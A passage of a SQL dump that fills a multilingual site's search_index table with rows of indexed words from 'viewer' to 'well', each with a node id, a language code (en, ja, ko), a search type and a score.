('viewer', 20, 'ja', 'help_search', 1),
('viewer', 20, 'ko', 'help_search', 1),
('viewing', 20, 'en', 'help_search', 1),
('viewing', 20, 'ja', 'help_search', 1),
('viewing', 20, 'ko', 'help_search', 1),
('viewing', 25, 'ja', 'help_search', 1),
('viewing', 46, 'en', 'help_search', 1),
('viewing', 46, 'ja', 'help_search', 1),
('viewing', 46, 'ko', 'help_search', 1),
('viewing', 84, 'en', 'help_search', 2),
('viewing', 84, 'ja', 'help_search', 2),
('viewing', 84, 'ko', 'help_search', 2),
('viewing', 92, 'en', 'help_search', 1),
('viewing', 92, 'ja', 'help_search', 1),
('viewing', 92, 'ko', 'help_search', 1),
('viewlanguagecenter', 205, 'en', 'node_search', 10),
('viewlanguagecenter', 205, 'ja', 'node_search', 10),
('viewport', 6, 'en', 'help_search', 2),
('viewport', 6, 'ja', 'help_search', 2),
('viewport', 6, 'ko', 'help_search', 2),
('viewports', 6, 'en', 'help_search', 1),
('viewports', 6, 'ja', 'help_search', 1),
('viewports', 6, 'ko', 'help_search', 1),
('views', 30, 'en', 'help_search', 1),
('views', 30, 'ja', 'help_search', 1),
('views', 30, 'ko', 'help_search', 1),
('views', 40, 'en', 'help_search', 1),
('views', 40, 'ja', 'help_search', 1),
('views', 40, 'ko', 'help_search', 1),
('views', 47, 'en', 'help_search', 1),
('views', 47, 'ja', 'help_search', 1),
('views', 47, 'ko', 'help_search', 1),
('views', 81, 'en', 'help_search', 1),
('views', 81, 'ja', 'help_search', 1),
('views', 81, 'ko', 'help_search', 1),
('views', 88, 'en', 'help_search', 4),
('views', 89, 'en', 'help_search', 29),
('views', 89, 'ja', 'help_search', 25),
('views', 89, 'ko', 'help_search', 25),
('views', 90, 'en', 'help_search', 4),
('views', 91, 'en', 'help_search', 15.572),
('views', 91, 'ja', 'help_search', 11.5295),
('views', 91, 'ko', 'help_search', 11.572),
('views', 93, 'en', 'help_search', 54.628),
('views', 93, 'ja', 'help_search', 54.628),
('views', 93, 'ko', 'help_search', 54.628),
('viewsfieldviewnode', 205, 'en', 'node_search', 10),
('viewsfieldviewnode', 205, 'ja', 'node_search', 10),
('virus', 31, 'en', 'node_search', 1.92607),
('visa', 3, 'en', 'node_search', 3),
('visa', 3, 'ko', 'node_search', 3),
('visa', 6, 'en', 'node_search', 28),
('visa', 7, 'en', 'node_search', 74),
('visa', 7, 'ko', 'node_search', 84),
('visa', 19, 'en', 'node_search', 3),
('visa', 19, 'ko', 'node_search', 3),
('visa', 23, 'en', 'node_search', 1.58163),
('visa', 24, 'en', 'node_search', 6.49668),
('visa', 24, 'ja', 'node_search', 1.58143),
('visa', 24, 'ko', 'node_search', 3.48098),
('visa', 30, 'en', 'node_search', 2),
('visa', 31, 'en', 'node_search', 0.916736),
('visa', 126, 'en', 'node_search', 1),
('visas', 62, 'en', 'node_search', 3),
('visawishing', 111, 'en', 'node_search', 1),
('visibility', 1, 'en', 'help_search', 4),
('visibility', 1, 'ja', 'help_search', 4),
('visibility', 1, 'ko', 'help_search', 4),
('visibility', 41, 'en', 'help_search', 2),
('visibility', 41, 'ja', 'help_search', 2),
('visibility', 41, 'ko', 'help_search', 2),
('visibility', 45, 'en', 'help_search', 4),
('visibility', 45, 'ja', 'help_search', 4),
('visibility', 45, 'ko', 'help_search', 4),
('visible', 7, 'en', 'help_search', 0.899454),
('visible', 7, 'ja', 'help_search', 0.899454),
('visible', 7, 'ko', 'help_search', 0.899454),
('visible', 9, 'en', 'help_search', 1),
('visible', 9, 'ja', 'help_search', 1),
('visible', 9, 'ko', 'help_search', 1),
('visible', 10, 'en', 'help_search', 1),
('visible', 10, 'ja', 'help_search', 1),
('visible', 10, 'ko', 'help_search', 1),
('visible', 22, 'en', 'help_search', 2.99731),
('visible', 22, 'ja', 'help_search', 2.99731),
('visible', 22, 'ko', 'help_search', 2.99731),
('visible', 23, 'en', 'help_search', 0.851346),
('visible', 23, 'ja', 'help_search', 0.851346),
('visible', 23, 'ko', 'help_search', 0.851346),
('visible', 24, 'en', 'help_search', 1),
('visible', 24, 'ja', 'help_search', 1),
('visible', 24, 'ko', 'help_search', 1),
('visible', 25, 'ja', 'help_search', 1),
('visible', 27, 'en', 'help_search', 1),
('visible', 27, 'ja', 'help_search', 1),
('visible', 27, 'ko', 'help_search', 1),
('visible', 31, 'ja', 'help_search', 1),
('visible', 45, 'en', 'help_search', 2),
('visible', 45, 'ja', 'help_search', 2),
('visible', 45, 'ko', 'help_search', 2),
('vision', 25, 'en', 'node_search', 46),
('visit', 22, 'en', 'help_search', 1.98902),
('visit', 22, 'ja', 'help_search', 1.98902),
('visit', 22, 'ko', 'help_search', 1.98902),
('visit', 32, 'en', 'help_search', 3),
('visit', 32, 'ja', 'help_search', 3),
('visit', 32, 'ko', 'help_search', 3),
('visit', 39, 'en', 'help_search', 1),
('visit', 39, 'ja', 'help_search', 1),
('visit', 39, 'ko', 'help_search', 1),
('visit', 59, 'en', 'help_search', 1),
('visit', 59, 'ja', 'help_search', 1),
('visit', 59, 'ko', 'help_search', 1),
('visit', 65, 'en', 'help_search', 1),
('visit', 65, 'ja', 'help_search', 1),
('visit', 65, 'ko', 'help_search', 1),
('visit', 66, 'en', 'node_search', 0.938382),
('visit', 68, 'en', 'help_search', 1),
('visit', 68, 'ja', 'help_search', 1),
('visit', 68, 'ko', 'help_search', 1),
('visit', 72, 'en', 'help_search', 1),
('visit', 72, 'ja', 'help_search', 1),
('visit', 72, 'ko', 'help_search', 1),
('visit', 77, 'en', 'help_search', 1),
('visit', 77, 'ja', 'help_search', 1),
('visit', 77, 'ko', 'help_search', 1),
('visit', 81, 'en', 'help_search', 1),
('visit', 81, 'ja', 'help_search', 1),
('visit', 81, 'ko', 'help_search', 1),
('visited', 47, 'en', 'help_search', 28),
('visited', 47, 'ja', 'help_search', 28),
('visited', 47, 'ko', 'help_search', 28),
('visited', 63, 'en', 'help_search', 1),
('visited', 63, 'ja', 'help_search', 1),
('visited', 63, 'ko', 'help_search', 1),
('visiting', 1, 'en', 'node_search', 1),
('visiting', 43, 'en', 'help_search', 1),
('visiting', 43, 'ja', 'help_search', 1),
('visiting', 43, 'ko', 'help_search', 1),
('visitor', 11, 'en', 'help_search', 1),
('visitor', 11, 'ja', 'help_search', 1),
('visitor', 11, 'ko', 'help_search', 1),
('visitors', 2, 'en', 'help_search', 1),
('visitors', 2, 'ja', 'help_search', 1),
('visitors', 2, 'ko', 'help_search', 1),
('visitors', 11, 'en', 'help_search', 0.913226),
('visitors', 11, 'ja', 'help_search', 0.913226),
('visitors', 11, 'ko', 'help_search', 0.913226),
('visitors', 20, 'en', 'help_search', 1),
('visitors', 20, 'ja', 'help_search', 1),
('visitors', 20, 'ko', 'help_search', 1),
('visitors', 31, 'ja', 'help_search', 2),
('visitors', 65, 'en', 'help_search', 1),
('visitors', 65, 'ja', 'help_search', 1),
('visitors', 65, 'ko', 'help_search', 1),
('visitors', 68, 'en', 'help_search', 0.842342),
('visitors', 68, 'ja', 'help_search', 0.842342),
('visitors', 68, 'ko', 'help_search', 0.842342),
('visitors', 73, 'en', 'help_search', 1),
('visitors', 73, 'ja', 'help_search', 1),
('visitors', 73, 'ko', 'help_search', 1),
('visitors', 84, 'en', 'help_search', 46),
('visitors', 84, 'ja', 'help_search', 46),
('visitors', 84, 'ko', 'help_search', 46);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('visits', 47, 'en', 'help_search', 19),
('visits', 47, 'ja', 'help_search', 19),
('visits', 47, 'ko', 'help_search', 19),
('visits', 72, 'en', 'help_search', 1),
('visits', 72, 'ja', 'help_search', 1),
('visits', 72, 'ko', 'help_search', 1),
('visual', 23, 'en', 'help_search', 4),
('visual', 23, 'ja', 'help_search', 4),
('visual', 23, 'ko', 'help_search', 4),
('visual', 28, 'en', 'help_search', 1),
('visual', 28, 'ja', 'help_search', 1),
('visual', 28, 'ko', 'help_search', 1),
('visual', 29, 'en', 'help_search', 2),
('visual', 29, 'ja', 'help_search', 2),
('visual', 29, 'ko', 'help_search', 2),
('visual', 35, 'en', 'help_search', 1),
('visual', 35, 'ja', 'help_search', 1),
('visual', 35, 'ko', 'help_search', 1),
('visually', 25, 'ja', 'help_search', 4),
('vital', 188, 'en', 'node_search', 1),
('viza', 6, 'ko', 'node_search', 29),
('vocabularies', 3, 'en', 'node_search', 1),
('vocabularies', 3, 'ko', 'node_search', 1),
('vocabularies', 79, 'en', 'help_search', 4),
('vocabularies', 79, 'ja', 'help_search', 4),
('vocabularies', 79, 'ko', 'help_search', 4),
('vocabularies', 80, 'en', 'help_search', 1.9347),
('vocabularies', 80, 'ja', 'help_search', 1.9347),
('vocabularies', 80, 'ko', 'help_search', 1.9347),
('vocabulary', 62, 'en', 'node_search', 1),
('vocabulary', 79, 'en', 'help_search', 35),
('vocabulary', 79, 'ja', 'help_search', 35),
('vocabulary', 79, 'ko', 'help_search', 35),
('vocabulary', 80, 'en', 'help_search', 6),
('vocabulary', 80, 'ja', 'help_search', 6),
('vocabulary', 80, 'ko', 'help_search', 6),
('vocabulary', 133, 'en', 'node_search', 1),
('w3c', 6, 'en', 'help_search', 10.3222),
('w3c', 6, 'ja', 'help_search', 10.3222),
('w3c', 6, 'ko', 'help_search', 10.3222),
('waei', 71, 'ja', 'node_search', 1),
('wah', 103, 'en', 'node_search', 2),
('wah', 103, 'ja', 'node_search', 2),
('wah', 139, 'en', 'node_search', 28),
('wah', 139, 'ja', 'node_search', 31),
('wai', 68, 'en', 'node_search', 8),
('wai', 68, 'ja', 'node_search', 8),
('wai', 71, 'en', 'node_search', 1),
('wai', 71, 'ja', 'node_search', 1),
('wai', 93, 'en', 'node_search', 2),
('wai', 93, 'ja', 'node_search', 2),
('wai', 105, 'en', 'node_search', 4),
('wai', 105, 'ja', 'node_search', 4),
('wai', 108, 'en', 'node_search', 2),
('wai', 108, 'ja', 'node_search', 2),
('wai', 127, 'en', 'node_search', 28),
('wai', 127, 'ja', 'node_search', 31),
('wai', 143, 'en', 'node_search', 56),
('wai', 143, 'ja', 'node_search', 62),
('wai', 144, 'en', 'node_search', 31),
('wai', 144, 'ja', 'node_search', 31),
('wai', 146, 'en', 'node_search', 58),
('wai', 146, 'ja', 'node_search', 2),
('wai', 157, 'en', 'node_search', 1),
('wai', 157, 'ja', 'node_search', 1),
('wai', 190, 'en', 'node_search', 6),
('wai', 190, 'ja', 'node_search', 4.07688),
('wait', 32, 'en', 'help_search', 1),
('wait', 32, 'ja', 'help_search', 1),
('wait', 32, 'ko', 'help_search', 1),
('wait', 49, 'en', 'help_search', 2),
('wait', 49, 'ja', 'help_search', 2),
('wait', 49, 'ko', 'help_search', 2),
('wait', 51, 'en', 'help_search', 1),
('wait', 51, 'ja', 'help_search', 1),
('wait', 51, 'ko', 'help_search', 1),
('wait', 74, 'en', 'help_search', 1),
('wait', 74, 'ja', 'help_search', 1),
('wait', 74, 'ko', 'help_search', 1),
('wait', 75, 'en', 'help_search', 1),
('wait', 75, 'ja', 'help_search', 1),
('wait', 75, 'ko', 'help_search', 1),
('wait', 77, 'en', 'help_search', 1),
('wait', 77, 'ja', 'help_search', 1),
('wait', 77, 'ko', 'help_search', 1),
('waiting', 67, 'en', 'help_search', 0.902857),
('waiting', 67, 'ja', 'help_search', 0.902857),
('waiting', 67, 'ko', 'help_search', 0.902857),
('walk', 68, 'en', 'help_search', 1.90318),
('walk', 68, 'ja', 'help_search', 1.90318),
('walk', 68, 'ko', 'help_search', 1.90318),
('walked', 68, 'en', 'help_search', 0.938382),
('walked', 68, 'ja', 'help_search', 0.938382),
('walked', 68, 'ko', 'help_search', 0.938382),
('walking', 68, 'en', 'help_search', 0.942091),
('walking', 68, 'ja', 'help_search', 0.942091),
('walking', 68, 'ko', 'help_search', 0.942091),
('walking', 162, 'en', 'node_search', 1),
('want', 1, 'en', 'help_search', 4),
('want', 1, 'ja', 'help_search', 4),
('want', 1, 'ko', 'help_search', 4),
('want', 3, 'en', 'help_search', 3),
('want', 3, 'en', 'node_search', 1),
('want', 3, 'ja', 'help_search', 3),
('want', 3, 'ko', 'help_search', 3),
('want', 3, 'ko', 'node_search', 1),
('want', 4, 'en', 'help_search', 1),
('want', 4, 'ja', 'help_search', 1),
('want', 4, 'ko', 'help_search', 1),
('want', 5, 'en', 'node_search', 28),
('want', 5, 'ko', 'node_search', 28),
('want', 8, 'en', 'node_search', 27),
('want', 9, 'en', 'help_search', 2),
('want', 9, 'ja', 'help_search', 2),
('want', 9, 'ko', 'help_search', 2),
('want', 10, 'en', 'node_search', 28),
('want', 10, 'ko', 'node_search', 28),
('want', 13, 'en', 'help_search', 1),
('want', 13, 'ja', 'help_search', 1),
('want', 13, 'ko', 'help_search', 1),
('want', 14, 'en', 'help_search', 1),
('want', 14, 'ja', 'help_search', 1),
('want', 14, 'ko', 'help_search', 1),
('want', 15, 'en', 'help_search', 2),
('want', 15, 'ja', 'help_search', 2),
('want', 15, 'ko', 'help_search', 2),
('want', 16, 'en', 'help_search', 2),
('want', 16, 'ja', 'help_search', 2),
('want', 16, 'ko', 'help_search', 2),
('want', 17, 'en', 'help_search', 2),
('want', 17, 'ja', 'help_search', 2),
('want', 17, 'ko', 'help_search', 2),
('want', 18, 'en', 'help_search', 1),
('want', 18, 'ja', 'help_search', 1),
('want', 18, 'ko', 'help_search', 1),
('want', 19, 'en', 'help_search', 1),
('want', 19, 'ja', 'help_search', 1),
('want', 19, 'ko', 'help_search', 1),
('want', 21, 'en', 'help_search', 1),
('want', 21, 'ja', 'help_search', 1),
('want', 21, 'ko', 'help_search', 1),
('want', 22, 'en', 'help_search', 1),
('want', 22, 'ja', 'help_search', 1),
('want', 22, 'ko', 'help_search', 1),
('want', 23, 'en', 'node_search', 1.83078),
('want', 24, 'en', 'help_search', 3),
('want', 24, 'en', 'node_search', 6.13384),
('want', 24, 'ja', 'help_search', 3),
('want', 24, 'ko', 'help_search', 3),
('want', 25, 'en', 'help_search', 3),
('want', 25, 'ja', 'help_search', 3),
('want', 26, 'en', 'help_search', 2),
('want', 26, 'en', 'node_search', 1),
('want', 26, 'ja', 'help_search', 2),
('want', 26, 'ko', 'help_search', 2),
('want', 27, 'en', 'help_search', 6),
('want', 27, 'ja', 'help_search', 6),
('want', 27, 'ko', 'help_search', 6),
('want', 28, 'en', 'help_search', 0.842342),
('want', 28, 'en', 'node_search', 3),
('want', 28, 'ja', 'help_search', 0.842342),
('want', 28, 'ko', 'help_search', 0.842342),
('want', 32, 'en', 'help_search', 1),
('want', 32, 'ja', 'help_search', 1),
('want', 32, 'ko', 'help_search', 1),
('want', 39, 'en', 'help_search', 2),
('want', 39, 'ja', 'help_search', 2),
('want', 39, 'ko', 'help_search', 2),
('want', 50, 'en', 'help_search', 1),
('want', 50, 'ja', 'help_search', 1),
('want', 50, 'ko', 'help_search', 1),
('want', 51, 'en', 'help_search', 1),
('want', 51, 'ja', 'help_search', 1),
('want', 51, 'ko', 'help_search', 1),
('want', 52, 'en', 'help_search', 1),
('want', 52, 'ja', 'help_search', 1),
('want', 52, 'ko', 'help_search', 1),
('want', 54, 'en', 'help_search', 2),
('want', 54, 'ja', 'help_search', 2),
('want', 54, 'ko', 'help_search', 2),
('want', 55, 'en', 'help_search', 2),
('want', 55, 'ja', 'help_search', 2),
('want', 55, 'ko', 'help_search', 2),
('want', 58, 'en', 'help_search', 1),
('want', 58, 'ja', 'help_search', 1),
('want', 58, 'ko', 'help_search', 1),
('want', 59, 'en', 'help_search', 1),
('want', 59, 'ja', 'help_search', 1),
('want', 59, 'ko', 'help_search', 1),
('want', 60, 'en', 'help_search', 1),
('want', 60, 'ja', 'help_search', 1),
('want', 60, 'ko', 'help_search', 1),
('want', 66, 'en', 'help_search', 1),
('want', 66, 'ja', 'help_search', 1),
('want', 69, 'en', 'help_search', 1),
('want', 69, 'ja', 'help_search', 1),
('want', 69, 'ko', 'help_search', 1),
('want', 71, 'en', 'help_search', 2),
('want', 71, 'ja', 'help_search', 2),
('want', 71, 'ko', 'help_search', 2),
('want', 74, 'en', 'help_search', 2),
('want', 74, 'ja', 'help_search', 2),
('want', 74, 'ko', 'help_search', 2),
('want', 75, 'en', 'help_search', 1),
('want', 75, 'ja', 'help_search', 1),
('want', 75, 'ko', 'help_search', 1),
('want', 77, 'en', 'help_search', 3),
('want', 77, 'ja', 'help_search', 3),
('want', 77, 'ko', 'help_search', 3),
('want', 78, 'en', 'help_search', 1),
('want', 78, 'ja', 'help_search', 1),
('want', 78, 'ko', 'help_search', 1),
('want', 79, 'en', 'help_search', 1),
('want', 79, 'ja', 'help_search', 1),
('want', 79, 'ko', 'help_search', 1),
('want', 82, 'en', 'help_search', 1),
('want', 82, 'ja', 'help_search', 1),
('want', 82, 'ko', 'help_search', 1),
('want', 86, 'en', 'help_search', 1.99731),
('want', 86, 'ja', 'help_search', 1.99731),
('want', 86, 'ko', 'help_search', 1.99731),
('want', 87, 'en', 'help_search', 2),
('want', 87, 'ja', 'help_search', 2),
('want', 87, 'ko', 'help_search', 2),
('want', 88, 'en', 'help_search', 2),
('want', 88, 'ja', 'help_search', 2),
('want', 88, 'ko', 'help_search', 2),
('want', 89, 'en', 'help_search', 1),
('want', 89, 'ja', 'help_search', 1),
('want', 89, 'ko', 'help_search', 1),
('want', 91, 'en', 'help_search', 3.98902),
('want', 91, 'ja', 'help_search', 3.98493),
('want', 91, 'ko', 'help_search', 3.98902),
('want', 92, 'en', 'help_search', 3),
('want', 92, 'ja', 'help_search', 3),
('want', 92, 'ko', 'help_search', 3),
('wanted', 4, 'en', 'node_search', 43),
('wanted', 4, 'ja', 'node_search', 43),
('wanted', 8, 'en', 'node_search', 27),
('wanted', 10, 'en', 'node_search', 3),
('wanted', 10, 'ko', 'node_search', 3),
('wanted', 18, 'en', 'node_search', 3),
('wanted', 18, 'ko', 'node_search', 3),
('wanted', 163, 'en', 'node_search', 27),
('wants', 31, 'en', 'node_search', 28),
('war', 165, 'en', 'node_search', 1),
('war', 165, 'ja', 'node_search', 1),
('warmest', 164, 'en', 'node_search', 1),
('warmly', 191, 'en', 'node_search', 1),
('warmly', 199, 'en', 'node_search', 1),
('warning', 85, 'en', 'help_search', 4),
('warning', 85, 'ja', 'help_search', 4),
('warning', 85, 'ko', 'help_search', 4),
('warnings', 76, 'en', 'help_search', 1),
('warnings', 76, 'ja', 'help_search', 1),
('warnings', 76, 'ko', 'help_search', 1),
('was', 1, 'en', 'help_search', 1),
('was', 1, 'ja', 'help_search', 1),
('was', 1, 'ko', 'help_search', 1),
('was', 9, 'en', 'node_search', 3),
('was', 14, 'en', 'help_search', 1),
('was', 14, 'ja', 'help_search', 1),
('was', 14, 'ko', 'help_search', 1),
('was', 15, 'en', 'help_search', 1),
('was', 15, 'ja', 'help_search', 1),
('was', 15, 'ko', 'help_search', 1),
('was', 17, 'en', 'node_search', 4),
('was', 23, 'en', 'node_search', 2),
('was', 27, 'en', 'node_search', 4.3332),
('was', 47, 'en', 'help_search', 1),
('was', 47, 'ja', 'help_search', 1),
('was', 47, 'ko', 'help_search', 1),
('was', 71, 'en', 'help_search', 1),
('was', 71, 'ja', 'help_search', 1),
('was', 71, 'ko', 'help_search', 1),
('was', 75, 'en', 'help_search', 1),
('was', 75, 'ja', 'help_search', 1),
('was', 75, 'ko', 'help_search', 1),
('was', 78, 'en', 'help_search', 1),
('was', 78, 'ja', 'help_search', 1),
('was', 78, 'ko', 'help_search', 1),
('water', 24, 'en', 'node_search', 0.916736),
('way', 6, 'en', 'help_search', 1),
('way', 6, 'ja', 'help_search', 1),
('way', 6, 'ko', 'help_search', 1),
('way', 28, 'en', 'help_search', 1),
('way', 28, 'ja', 'help_search', 1),
('way', 28, 'ko', 'help_search', 1),
('way', 29, 'en', 'help_search', 1),
('way', 29, 'ja', 'help_search', 1),
('way', 29, 'ko', 'help_search', 1),
('way', 32, 'en', 'help_search', 2),
('way', 32, 'ja', 'help_search', 2),
('way', 32, 'ko', 'help_search', 2),
('way', 37, 'en', 'help_search', 0.942091),
('way', 37, 'ja', 'help_search', 0.942091),
('way', 37, 'ko', 'help_search', 0.942091),
('way', 44, 'en', 'help_search', 1),
('way', 44, 'ja', 'help_search', 1),
('way', 44, 'ko', 'help_search', 1),
('way', 50, 'en', 'help_search', 1),
('way', 50, 'ja', 'help_search', 1),
('way', 50, 'ko', 'help_search', 1),
('way', 93, 'en', 'help_search', 0.886095),
('way', 93, 'ja', 'help_search', 0.886095),
('way', 93, 'ko', 'help_search', 0.886095),
('ways', 30, 'en', 'help_search', 1),
('ways', 30, 'ja', 'help_search', 1),
('ways', 30, 'ko', 'help_search', 1),
('ways', 31, 'ja', 'help_search', 1),
('ways', 80, 'en', 'help_search', 1),
('ways', 80, 'ja', 'help_search', 1),
('ways', 80, 'ko', 'help_search', 1),
('wealth', 62, 'en', 'node_search', 1),
('web', 2, 'en', 'help_search', 1),
('web', 2, 'ja', 'help_search', 1),
('web', 2, 'ko', 'help_search', 1),
('web', 11, 'en', 'help_search', 1),
('web', 11, 'ja', 'help_search', 1),
('web', 11, 'ko', 'help_search', 1),
('web', 32, 'en', 'help_search', 2),
('web', 32, 'ja', 'help_search', 2),
('web', 32, 'ko', 'help_search', 2),
('web', 36, 'en', 'help_search', 1),
('web', 36, 'ja', 'help_search', 1),
('web', 36, 'ko', 'help_search', 1),
('web', 44, 'en', 'help_search', 93),
('web', 44, 'ja', 'help_search', 93),
('web', 44, 'ko', 'help_search', 93),
('web', 62, 'en', 'help_search', 1),
('web', 62, 'ja', 'help_search', 1),
('web', 62, 'ko', 'help_search', 1),
('web', 65, 'en', 'help_search', 2),
('web', 65, 'ja', 'help_search', 2),
('web', 65, 'ko', 'help_search', 2),
('web', 72, 'en', 'help_search', 3),
('web', 72, 'ja', 'help_search', 3),
('web', 72, 'ko', 'help_search', 3),
('website', 1, 'en', 'node_search', 18),
('website', 10, 'en', 'help_search', 2),
('website', 10, 'ja', 'help_search', 2),
('website', 10, 'ko', 'help_search', 2),
('website', 11, 'en', 'help_search', 1),
('website', 11, 'en', 'node_search', 1),
('website', 11, 'ja', 'help_search', 1),
('website', 11, 'ja', 'node_search', 1),
('website', 11, 'ko', 'help_search', 1),
('website', 18, 'en', 'help_search', 1),
('website', 18, 'ja', 'help_search', 1),
('website', 18, 'ko', 'help_search', 1),
('website', 31, 'ja', 'help_search', 1),
('website', 40, 'en', 'help_search', 26),
('website', 40, 'ja', 'help_search', 26),
('website', 40, 'ko', 'help_search', 26),
('website', 62, 'en', 'node_search', 0.771698),
('website', 62, 'ja', 'node_search', 0.465433),
('website', 65, 'en', 'help_search', 1),
('website', 65, 'ja', 'help_search', 1),
('website', 65, 'ko', 'help_search', 1),
('website', 66, 'en', 'node_search', 0.934703),
('website', 80, 'en', 'help_search', 3),
('website', 80, 'ja', 'help_search', 3),
('website', 80, 'ko', 'help_search', 3),
('website', 86, 'en', 'help_search', 2),
('website', 86, 'ja', 'help_search', 2),
('website', 86, 'ko', 'help_search', 2),
('wed', 5, 'en', 'node_search', 1),
('wed', 5, 'ja', 'node_search', 1),
('wed', 5, 'ko', 'node_search', 1),
('wed', 10, 'en', 'node_search', 1),
('wed', 10, 'ja', 'node_search', 1),
('wed', 10, 'ko', 'node_search', 1),
('wed', 11, 'en', 'node_search', 1),
('wed', 19, 'en', 'node_search', 1),
('wed', 19, 'ja', 'node_search', 1),
('wed', 19, 'ko', 'node_search', 1),
('wed', 31, 'en', 'node_search', 1),
('wed', 83, 'en', 'node_search', 1),
('wed', 83, 'ja', 'node_search', 1),
('wed', 84, 'en', 'node_search', 1),
('wed', 84, 'ja', 'node_search', 1),
('wed', 100, 'en', 'node_search', 1),
('wed', 100, 'ja', 'node_search', 1),
('wed', 101, 'en', 'node_search', 1),
('wed', 101, 'ja', 'node_search', 1),
('wed', 102, 'en', 'node_search', 1),
('wed', 102, 'ja', 'node_search', 1),
('wed', 103, 'en', 'node_search', 1),
('wed', 103, 'ja', 'node_search', 1),
('wed', 104, 'en', 'node_search', 1),
('wed', 104, 'ja', 'node_search', 1),
('wed', 105, 'en', 'node_search', 1),
('wed', 105, 'ja', 'node_search', 1),
('wed', 106, 'en', 'node_search', 1),
('wed', 106, 'ja', 'node_search', 1),
('wed', 107, 'en', 'node_search', 2),
('wed', 107, 'ja', 'node_search', 2),
('wed', 108, 'en', 'node_search', 1),
('wed', 108, 'ja', 'node_search', 1),
('wed', 109, 'en', 'node_search', 1),
('wed', 109, 'ja', 'node_search', 1),
('wed', 110, 'en', 'node_search', 1),
('wed', 110, 'ja', 'node_search', 1),
('wed', 111, 'en', 'node_search', 1),
('wed', 111, 'ja', 'node_search', 1),
('wed', 112, 'en', 'node_search', 1),
('wed', 112, 'ja', 'node_search', 1),
('wed', 113, 'en', 'node_search', 2),
('wed', 113, 'ja', 'node_search', 2),
('wed', 114, 'en', 'node_search', 1),
('wed', 114, 'ja', 'node_search', 1),
('wed', 115, 'en', 'node_search', 2),
('wed', 115, 'ja', 'node_search', 2),
('wed', 116, 'en', 'node_search', 1),
('wed', 116, 'ja', 'node_search', 1),
('wed', 117, 'en', 'node_search', 2),
('wed', 117, 'ja', 'node_search', 2),
('wed', 118, 'en', 'node_search', 1),
('wed', 118, 'ja', 'node_search', 1),
('wed', 119, 'en', 'node_search', 1),
('wed', 119, 'ja', 'node_search', 1),
('wed', 120, 'en', 'node_search', 1),
('wed', 120, 'ja', 'node_search', 1),
('wed', 121, 'en', 'node_search', 1),
('wed', 121, 'ja', 'node_search', 1),
('wed', 122, 'en', 'node_search', 2),
('wed', 122, 'ja', 'node_search', 2),
('wed', 123, 'en', 'node_search', 1),
('wed', 123, 'ja', 'node_search', 1),
('wed', 124, 'en', 'node_search', 1),
('wed', 124, 'ja', 'node_search', 1),
('wed', 125, 'en', 'node_search', 1),
('wed', 125, 'ja', 'node_search', 1),
('wed', 126, 'en', 'node_search', 2),
('wed', 126, 'ja', 'node_search', 2),
('wed', 127, 'en', 'node_search', 1),
('wed', 127, 'ja', 'node_search', 1),
('wed', 128, 'en', 'node_search', 1),
('wed', 128, 'ja', 'node_search', 1),
('wed', 129, 'en', 'node_search', 1),
('wed', 129, 'ja', 'node_search', 1),
('wed', 130, 'en', 'node_search', 1),
('wed', 130, 'ja', 'node_search', 1),
('wed', 131, 'en', 'node_search', 1),
('wed', 131, 'ja', 'node_search', 1),
('wed', 132, 'en', 'node_search', 1),
('wed', 132, 'ja', 'node_search', 1),
('wed', 135, 'en', 'node_search', 1),
('wed', 135, 'ja', 'node_search', 1),
('wed', 136, 'en', 'node_search', 1),
('wed', 136, 'ja', 'node_search', 1),
('wed', 138, 'en', 'node_search', 1),
('wed', 138, 'ja', 'node_search', 1),
('wed', 162, 'en', 'node_search', 1),
('wed', 162, 'ja', 'node_search', 1),
('wed', 165, 'en', 'node_search', 1),
('wed', 165, 'ja', 'node_search', 1),
('wed', 166, 'en', 'node_search', 1),
('wed', 166, 'ja', 'node_search', 1),
('wed', 168, 'en', 'node_search', 1),
('wed', 168, 'ja', 'node_search', 1),
('wed', 173, 'en', 'node_search', 1),
('wed', 173, 'ja', 'node_search', 1),
('wed', 174, 'en', 'node_search', 1),
('wed', 174, 'ja', 'node_search', 1),
('wed', 192, 'en', 'node_search', 1),
('wed', 192, 'ja', 'node_search', 1),
('wed', 193, 'en', 'node_search', 1),
('wed', 193, 'ja', 'node_search', 1),
('wed', 194, 'en', 'node_search', 1),
('wed', 194, 'ja', 'node_search', 1),
('wed', 195, 'en', 'node_search', 1),
('wed', 195, 'ja', 'node_search', 1),
('wed', 196, 'en', 'node_search', 1),
('wed', 196, 'ja', 'node_search', 1),
('wed', 204, 'en', 'node_search', 2),
('wed', 204, 'ja', 'node_search', 2),
('wed', 205, 'en', 'node_search', 1),
('wed', 205, 'ja', 'node_search', 1),
('wednesday', 62, 'en', 'node_search', 1.85107),
('week', 31, 'en', 'node_search', 1),
('week', 32, 'en', 'help_search', 1),
('week', 32, 'ja', 'help_search', 1),
('week', 32, 'ko', 'help_search', 1),
('week', 162, 'en', 'node_search', 0.945829),
('weekend', 142, 'en', 'node_search', 1),
('weekly', 32, 'en', 'help_search', 1),
('weekly', 32, 'ja', 'help_search', 1),
('weekly', 32, 'ko', 'help_search', 1),
('weights', 42, 'en', 'help_search', 5),
('weights', 42, 'ja', 'help_search', 5),
('weights', 42, 'ko', 'help_search', 5),
('welcome', 1, 'en', 'node_search', 16),
('weld', 31, 'en', 'node_search', 1),
('welder', 8, 'en', 'node_search', 27),
('welder', 8, 'ko', 'node_search', 27),
('welder', 24, 'en', 'node_search', 1),
('welder', 31, 'en', 'node_search', 1),
('welders', 31, 'en', 'node_search', 28),
('welding', 3, 'en', 'node_search', 46),
('welding', 3, 'ko', 'node_search', 46),
('welding', 6, 'en', 'node_search', 3),
('welding', 8, 'en', 'node_search', 27),
('welding', 9, 'en', 'node_search', 28),
('welding', 17, 'en', 'node_search', 29),
('welding', 19, 'en', 'node_search', 3),
('welding', 19, 'ko', 'node_search', 3),
('welding', 20, 'en', 'node_search', 28),
('welding', 20, 'ko', 'node_search', 28),
('welding', 23, 'en', 'node_search', 0.993146),
('welding', 31, 'en', 'node_search', 1.89272),
('well', 18, 'en', 'node_search', 1),
('well', 18, 'ko', 'node_search', 1),
('well', 24, 'en', 'help_search', 1),
('well', 24, 'ja', 'help_search', 1),
('well', 24, 'ko', 'help_search', 1),
('well', 30, 'en', 'node_search', 2),
('well', 32, 'en', 'help_search', 2),
('well', 32, 'ja', 'help_search', 2),
('well', 32, 'ko', 'help_search', 2),
('well', 37, 'en', 'help_search', 0.860547),
('well', 37, 'ja', 'help_search', 0.860547),
('well', 37, 'ko', 'help_search', 0.860547),
